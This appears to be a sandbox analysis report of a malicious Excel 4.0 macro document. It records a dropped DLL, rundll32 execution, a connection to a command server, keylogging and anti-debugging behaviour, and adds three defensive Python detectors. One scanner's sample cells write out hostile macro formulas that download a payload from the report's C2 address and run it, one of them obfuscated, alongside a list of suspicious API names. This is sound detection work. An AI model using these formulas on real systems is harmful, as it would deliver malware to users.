Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp Binary or memory string: DirectDrawCreateEx
Installs a raw input device (often for capturing keystrokes)
Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp Binary or memory string: GetRawInputData
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1108, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
Source: Screenshot number: 4 Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start . the decryption of the docum
Source: Screenshot number: 8 Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
Source: Document image extraction number: 2 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2 Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3 Screenshot OCR: Enable Content
Source: Document image extraction number: 4 Screenshot OCR: Enable Editing
Source: Document image extraction number: 13 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13 Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Screenshot number: 12 Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
Found Excel 4.0 Macro with suspicious formulas
Source: Documents_460000622_1464906353.xls Initial sample: EXEC
Source: Documents_460000622_1464906353.xls Initial sample: CALL
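The EXEC and CALL hits above are the two Excel 4.0 (XLM) functions that turn a spreadsheet into a loader. The scanner below is an added example for this report, not part of the sandbox output or of the sample: it takes formula strings (extracting them from a real .xls needs a parser such as olevba from oletools), folds the CHAR()-and-& concatenation trick that XLM droppers use to hide those names, and flags cells that call a code-executing function or pass a download/execution API name to CALL. The cells in SAMPLE_CELLS are constructed to mirror what this report observed (rundll32 on ..\ndgfht.frg, the 52.12.4.186 URL) and go beyond it only in the CHAR() obfuscation case; they are not the sample's real cell contents.

```python
r"""Scan Excel 4.0 (XLM) macro formulas for the EXEC/CALL pattern this report flags.

Added example for this report; it is not part of the sandbox output. The
formula cells below are constructed to mirror what the report observed
(EXEC launching rundll32 on ..\ndgfht.frg, a download from the C2 URL); they
are not the sample's actual cells. Extracting real cells from an .xls needs a
parser such as olevba from oletools; this script only takes formula strings.
"""
import re

# XLM functions that execute code, call native APIs, or write/evaluate formulas.
SUSPICIOUS_FUNCTIONS = {"EXEC", "CALL", "REGISTER", "REGISTER.ID", "FORMULA",
                        "FORMULA.FILL", "FOPEN", "FWRITE", "RUN"}
# Native API names commonly passed to CALL/REGISTER as string arguments.
SUSPICIOUS_API_STRINGS = ("urldownloadtofile", "shellexecute", "winexec",
                          "createprocess", "virtualalloc")

CHAR_RE = re.compile(r"CHAR\((\d+)\)", re.I)
CONCAT_RE = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
STRING_RE = re.compile(r'"[^"]*"')
FUNC_RE = re.compile(r"([A-Z][A-Z0-9.]*)\s*\(", re.I)


def fold_strings(formula: str) -> str:
    """Resolve CHAR(n) and "a"&"b" concatenations into plain string literals.

    This undoes the most common XLM string obfuscation so that function
    names and API strings assembled at runtime become visible to the scanner.
    (CHAR(34), a double quote, is not re-escaped; that case is left as-is.)
    """
    folded = CHAR_RE.sub(lambda m: '"' + chr(int(m.group(1))) + '"', formula)
    while True:
        merged = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', folded)
        if merged == folded:
            return folded
        folded = merged


def scan_formulas(cells: dict) -> list:
    """Return one finding per cell whose (deobfuscated) formula is suspicious."""
    findings = []
    for cell, formula in cells.items():
        folded = fold_strings(formula)
        # Function names are taken with string literals blanked out, so text
        # inside quotes cannot masquerade as a call.
        code_only = STRING_RE.sub('""', folded)
        functions = sorted({f.upper() for f in FUNC_RE.findall(code_only)} & SUSPICIOUS_FUNCTIONS)
        literals = " ".join(s.strip('"') for s in STRING_RE.findall(folded)).lower()
        api_hits = [api for api in SUSPICIOUS_API_STRINGS if api in literals]
        if functions or api_hits:
            findings.append({"cell": cell, "functions": functions,
                             "api_strings": api_hits, "folded": folded})
    return findings


# Constructed sample cells (not the real sheet contents of this sample).
SAMPLE_CELLS = {
    "Sheet1!A1": r'=EXEC("rundll32 ..\ndgfht.frg,PluginInit")',
    "Sheet1!A2": r'=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://52.12.4.186/news/update","..\ndgfht.frg",0,0)',
    "Sheet1!A3": r'=EXEC(CHAR(114)&CHAR(117)&CHAR(110)&"dll32 ..\ndgfht.frg,PluginInit")',
    "Sheet1!A4": "=SUM(B1:B9)",
    "Sheet1!A5": "=HALT()",
}

if __name__ == "__main__":
    for f in scan_formulas(SAMPLE_CELLS):
        print(f["cell"], f["functions"], f["api_strings"], f["folded"])
```

Folding before matching is what makes the A3 case visible: a keyword match on the raw formula would see only CHAR() calls and a harmless-looking suffix.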
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ndgfht.frg Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll Jump to dropped file
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E777A4B NtQueryInformationProcess, 4_2_6E777A4B
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E783C31 4_2_6E783C31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7A9E50 4_2_6E7A9E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E5FFD 4_2_6E7E5FFD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7F3FDF 4_2_6E7F3FDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7F0C10 4_2_6E7F0C10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E5DC3 4_2_6E7E5DC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7A8A70 4_2_6E7A8A70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E5B94 4_2_6E7E5B94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E595A 4_2_6E7E595A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D665D 4_2_6E7D665D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7F0760 4_2_6E7F0760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E79A730 4_2_6E79A730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E572B 4_2_6E7E572B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E6723 4_2_6E7E6723
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E64C6 4_2_6E7E64C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7ED5DE 4_2_6E7ED5DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E625A 4_2_6E7E625A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E79C2D0 4_2_6E79C2D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7FB360 4_2_6E7FB360
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D83F0 4_2_6E7D83F0
Document contains embedded VBA macros
Source: Documents_460000622_1464906353.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E7794D0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E7D4553 appears 73 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E7D4E40 appears 54 times
Yara signature match
Source: Documents_460000622_1464906353.xls, type: SAMPLE Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.expl.evad.winXLS@7/12@1/2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E777B4D CoCreateInstance, 4_2_6E777B4D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{ce7c126a-cd42-45d2-8a55-1f743478800b}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{395c2195-6d12-42eb-b952-6aae2e230819}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD7B8.tmp Jump to behavior
Source: Documents_460000622_1464906353.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts (2 times) Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wininet.pdb source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb;Y source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000004.00000003.2166262652.0000000002531000.00000004.00000001.sdmp
Source: Binary string: c:\over\sat\63_Safe\tra\fell\clear.pdb source: rundll32.exe, 00000004.00000002.2257199515.000000006E815000.00000002.00020000.sdmp, ndgfht.frg.0.dr
Source: Binary string: shell32.pdb9 source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.2163524826.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb source: rundll32.exe, 00000004.00000003.2163347382.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp
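The process-creation lines above record the full chain: EXCEL.EXE starts rundll32.exe on a file named ..\ndgfht.frg with the export PluginInit, the 64-bit rundll32 re-launches the SysWOW64 copy with the same arguments, and that process spawns cmd.exe. The script below is an added example, not part of the sandbox report: it replays those lines as constructed (parent image, child image, command line) tuples, which is an assumed layout for an EDR or Sysmon export rather than a Joe Sandbox format, and applies the three checks a detection engineer would write for this chain: an Office parent for rundll32, a rundll32 module that is not a DLL-type file on an absolute system path, and a shell spawned by rundll32.

```python
r"""Flag the Office -> rundll32 -> cmd.exe chain recorded in this report.

Added example, not part of the sandbox output. SAMPLE_EVENTS is constructed
from the report's "Process created" lines; the (parent, image, command line)
layout is an assumption about an EDR/Sysmon export, not a sandbox format.
"""
import ntpath
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Extensions a legitimate rundll32 invocation normally loads.
EXPECTED_MODULE_EXTS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}

# "rundll32[.exe] <module>,<export> [args]"; the module may be quoted.
RUNDLL32_RE = re.compile(
    r'^\s*"?\S*?rundll32(?:\.exe)?"?\s+(?P<module>"[^"]+"|[^\s,]+)\s*,\s*(?P<export>\S+)',
    re.I)


def parse_rundll32(command_line: str):
    """Return (module, export) from a rundll32 command line, or None."""
    m = RUNDLL32_RE.match(command_line)
    if not m:
        return None
    return m.group("module").strip('"'), m.group("export")


def module_is_suspicious(module: str) -> str:
    """Return a reason if the module rundll32 loads looks wrong, else an empty string."""
    ext = ntpath.splitext(module)[1].lower()
    if ext not in EXPECTED_MODULE_EXTS:
        return f"module extension {ext or '(none)'} is not a DLL-type extension"
    if not ntpath.isabs(module):
        return "module given as a relative path"
    if "\\users\\" in module.lower():
        return "module lives under a user profile"
    return ""


def triage(events) -> list:
    """events: iterable of (parent_image, image, command_line). Returns findings in order."""
    findings = []
    for parent, image, cmdline in events:
        parent_name = ntpath.basename(parent).lower()
        image_name = ntpath.basename(image).lower()
        if image_name == "rundll32.exe":
            if parent_name in OFFICE_IMAGES:
                findings.append({"rule": "office_spawns_rundll32", "command_line": cmdline,
                                 "detail": f"parent {parent_name}"})
            parsed = parse_rundll32(cmdline)
            if parsed:
                module, export = parsed
                reason = module_is_suspicious(module)
                if reason:
                    findings.append({"rule": "rundll32_suspicious_module", "command_line": cmdline,
                                     "detail": f"{reason}; export {export}"})
        if parent_name == "rundll32.exe" and image_name in SHELL_IMAGES:
            findings.append({"rule": "rundll32_spawns_shell", "command_line": cmdline,
                             "detail": f"{image_name} spawned by rundll32"})
    return findings


# Constructed from the report's process-creation lines, plus one benign control.
SAMPLE_EVENTS = [
    ("unknown",
     r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"),
    (r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     r"C:\Windows\System32\rundll32.exe",
     r"rundll32 ..\ndgfht.frg,PluginInit"),
    (r"C:\Windows\System32\rundll32.exe",
     r"C:\Windows\SysWOW64\rundll32.exe",
     r"rundll32 ..\ndgfht.frg,PluginInit"),
    (r"C:\Windows\SysWOW64\rundll32.exe",
     r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\Windows\System32\cmd.exe"),
    # benign control: Explorer launching rundll32 on a real system DLL
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["rule"], "|", f["detail"], "|", f["command_line"])
```

The module check fires twice here (once per rundll32 hop), which is what you want: the WOW64 re-launch is itself a signal that a 32-bit payload was handed to the 64-bit loader.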

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E784371 push ecx; ret 4_2_6E784384
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E792E8F push ss; retf 4_2_6E792EAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D4E86 push ecx; ret 4_2_6E7D4E99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7926ED push esp; retf 4_2_6E7926FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D451C push ecx; ret 4_2_6E7D452F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E79521B push esp; ret 4_2_6E79521C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E791047 push esp; retf 4_2_6E79108E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E794020 push cs; ret 4_2_6E794041

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ndgfht.frg Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ndgfht.frg Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ndgfht.frg Jump to dropped file
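The report flags ndgfht.frg because its content is a PE image while its extension is not. The check below is an added example, not part of the sandbox output: it validates the MZ signature, the e_lfanew offset, the PE\0\0 signature and the 20-byte COFF header before trusting any field (so a truncated or hand-crafted header cannot crash the scanner), then compares the result with the file's extension. The PE bytes are constructed in build_fake_pe rather than taken from the real dropper, and the report's paths are reused only as labels; the zero-filled GDIPFONTCACHEV1.DAT content is likewise constructed.

```python
r"""Check whether a dropped file's content matches its extension, as the report
does for C:\Users\user\ndgfht.frg (a PE32 image named .frg).

Added example, not part of the sandbox output. The PE bytes are built here
(DOS header, e_lfanew, "PE\0\0" and a COFF header) rather than taken from the
real dropper, so this runs offline; the report's file names are labels only.
"""
import ntpath
import struct

PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".cpl", ".ocx", ".drv", ".efi"}
IMAGE_FILE_DLL = 0x2000
MACHINES = {0x014C: "i386", 0x8664: "x86-64", 0xAA64: "arm64"}


def sniff_pe(data: bytes):
    """Return PE header facts if data is a PE image, else None.

    Checks the MZ signature, that e_lfanew plus the PE signature and COFF
    header (24 bytes) fit inside the buffer, and the PE\0\0 signature, so a
    truncated or crafted header is rejected instead of raising.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, _nsec, _ts, _symtab, _nsym, _optsize, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    return {"machine": MACHINES.get(machine, hex(machine)),
            "is_dll": bool(chars & IMAGE_FILE_DLL),
            "characteristics": chars}


def classify_drop(path: str, data: bytes) -> dict:
    """Compare the on-disk extension with what the content actually is."""
    ext = ntpath.splitext(path)[1].lower()
    pe = sniff_pe(data)
    if pe is None:
        verdict = "not_pe"
    elif ext in PE_EXTENSIONS:
        verdict = "pe"
    else:
        verdict = "pe_with_non_pe_extension"
    return {"path": path, "extension": ext, "verdict": verdict, "pe": pe}


def scan_drops(drops) -> list:
    """drops: iterable of (path, content). Returns [(path, verdict), ...]."""
    return [(path, classify_drop(path, data)["verdict"]) for path, data in drops]


def build_fake_pe(machine: int = 0x014C, characteristics: int = 0x2102) -> bytes:
    """Constructed minimal PE image: MZ header, e_lfanew = 0x40, PE signature, COFF header.

    0x2102 = IMAGE_FILE_DLL | IMAGE_FILE_32BIT_MACHINE | IMAGE_FILE_EXECUTABLE_IMAGE,
    i.e. a 32-bit DLL like the one the WOW64 rundll32 loaded in this report.
    """
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff


# Constructed contents; only the paths come from the report.
SAMPLE_DROPS = [
    (r"C:\Users\user\ndgfht.frg", build_fake_pe()),
    (r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll",
     build_fake_pe()),
    (r"C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT", b"\0" * 64),
    (r"C:\Users\user\truncated.frg", b"MZ" + b"\0" * 10),  # MZ but no room for e_lfanew
]

if __name__ == "__main__":
    for path, verdict in scan_drops(SAMPLE_DROPS):
        print(verdict, path)
```

Extension allow-lists are only half the check: a dropper can just as easily name its payload .dll and rely on rundll32, as the second file here shows, so the PE sniff should feed a "PE written by an Office process" rule rather than stand alone.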

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ndgfht.frg Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (26 times) Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (6 times) Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp Binary or memory string: CDB.EXEWINDBG.EXE
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77F61E FindFirstFileExW, 4_2_6E77F61E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E802EC8 FindFirstFileExA, 4_2_6E802EC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E803336 FindFirstFileExA, 4_2_6E803336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E803361 FindFirstFileExW, 4_2_6E803361

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77D332 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E77D332
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77F248 mov eax, dword ptr fs:[00000030h] 4_2_6E77F248
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77C61C mov eax, dword ptr fs:[00000030h] 4_2_6E77C61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7F4D21 mov eax, dword ptr fs:[00000030h] 4_2_6E7F4D21
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77865C GetProcessHeap,InternetQueryDataAvailable, 4_2_6E77865C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77D332 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E77D332
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E778FBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_6E778FBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7791BB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E7791BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D4A3C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E7D4A3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7D4728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_6E7D4728
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7E9302 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E7E9302

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.12.4.186 187 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: Documents_460000622_1464906353.xls, type: SAMPLE
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: FoldersAppPropertiesPROGMAN
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp Binary or memory string: GetProgmanWindow
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: ProgmanProgman3
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp Binary or memory string: IMECreateGroupShowGroupAddItemExitProgmanDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileDDEClientddeClassccInsDDEBWWFrameDDEClientWndClassBACKSCAPE#32770SenderCA_DDECLASSInstallMake Program Manager GroupViewFolderExploreFolder
Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp Binary or memory string: SetProgmanWindow

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E7792E1 cpuid 4_2_6E7792E1
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 4_2_6E806E8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E7FBF12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E7FBFFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 4_2_6E806CB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 4_2_6E806DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 4_2_6E806B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E8068B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E806818
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 4_2_6E7FC8E3
